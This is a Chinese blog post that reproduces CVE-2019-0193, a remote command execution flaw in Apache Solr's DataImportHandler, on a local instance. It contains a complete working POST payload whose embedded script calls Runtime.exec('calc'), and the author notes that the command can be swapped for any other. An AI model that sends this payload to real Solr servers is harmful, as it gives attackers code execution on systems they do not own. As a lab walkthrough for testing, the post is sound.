美文网首页
CVE-2019-0193:Apache Solr 远程命令执行

CVE-2019-0193:Apache Solr 远程命令执行

作者: 违规昵称不予展示 | 来源:发表于2019-08-20 12:33 被阅读0次

感谢指路:https://www.cnblogs.com/paperpen/p/11328728.html
影响范围
Apache Solr < 8.2.0
1.先把下载好的文件解压

image.png

2.然后在cmd或powershell中打开,让应用运行起来


image.png

3.查看模块名称 http://localhost:8983/solr/admin/cores

image.png

4.构造命令执行 http://localhost:8983/solr/atom/dataimport

image.png
# POST内容的主体
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=atom&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
 url="https://stackoverflow.com/feeds/tag/solr"
 processor="XPathEntityProcessor"
 forEach="/feed"
 transformer="script:poc" />
</document>
</dataConfig>

中间遇到一点小问题,entity这个标签中每个属性之间都要有空格,从别人那粘过来的时候没有空格导致报错元素类型 * 必须后跟属性规范 ">" 或 "/>"
5.这样就弹出了计算器,命令执行成功
命令写在POST body中的js脚本中process.exec()方法中可以按需修改


相关文章

网友评论

      本文标题:CVE-2019-0193:Apache Solr 远程命令执行

      本文链接:https://www.haomeiwen.com/subject/zteusctx.html